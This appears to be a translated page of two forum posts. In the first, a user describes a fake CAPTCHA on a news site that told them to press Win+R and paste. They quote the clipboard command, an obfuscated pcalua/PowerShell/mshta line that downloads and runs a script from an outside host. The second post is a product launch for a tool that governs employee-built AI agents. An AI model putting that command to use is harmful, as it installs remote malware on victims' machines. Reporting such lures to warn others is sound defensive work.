15 分•作者: Jgoauh•2 个月前•原帖
大家好, 今天早上,当我开始上班时,我想先浏览一些新闻博客/网站来开启新的一天。当我访问 Crooked Timber 时,却看到一个验证码页面,看起来像是传统的 Google 验证码。 我点击了它,加载旋转图标转动,右侧弹出了一个框,显示着传统的“验证您是人类”的白色标题,背景是蓝色的。 它显示了两个“手动验证步骤”: 1. 按下 Win + R 2. 按下 Ctrl + V,然后点击运行 起初我以为这是新型验证码,用来检查物理键盘是否连接到浏览器。但我立刻意识到这是试图让我在我的机器上运行一个脚本。 我打开了一个新的窗口,令我惊讶的是,我的剪贴板中有一些新内容: “pcalua -a "PowerShell" -c "saps cmd '/v/c m^s^h^t^a h^t^t^p^s^:^//fine-work-team.com/6272' -Wi Hi"” 我将其提交给我工作可以访问的一个大型语言模型,它告诉我绝对不要运行这个命令(我本来就不打算运行),并解释说这个命令会从该 URL 下载并运行一个脚本。 我该如何在未来保护自己免受这些诈骗/黑客尝试?我一直认为自己是“准备好的”,但这次让我感到惊讶。 你们之前遇到过这种情况吗?你们是如何保护自己的?
17 分•作者: retsol•2 个月前•原帖
大家好!我是Tines的Yannick,今天非常兴奋地与大家分享我们即将推出的产品。 Tines 3B是我们为团队构建代理、应用程序和自动化工具而开发的新产品,基于这样一个假设:人们已经在进行这些工作,无论IT或安全部门是否知情。 金融、市场营销等领域的团队正在使用Claude Code或Codex构建仪表盘。这些工作并没有恶意,大家只是按照要求在做事。问题在于,这些工作没有安全的运行方式:最终它们会存储在个人电脑或个人账户中,凭证直接粘贴在代码里,其他人无法看到这些内容的存在。 Tines 3B就是为了解决这个问题而诞生的:每个人仍然可以以相同的方式构建,但它在IT和安全部门能够实际看到和控制的环境中执行。 我们的产品以代码为中心,用户只需描述所需功能,您的大语言模型(LLM)将负责实现,执行过程是隔离的,凭证通过代理处理,而不是嵌入在代码中。 我们的另一款产品在过去8年里一直在安全和IT团队的最敏感系统中运行。这是同样的根本问题(谁可以访问什么,谁可以看到这些内容),只是针对新一类的构建者。 我们的探索版永久免费,完全自助服务:<a href="https://login.tines.com/saml_idp/signup" rel="nofollow">https://login.tines.com/saml_idp/signup</a>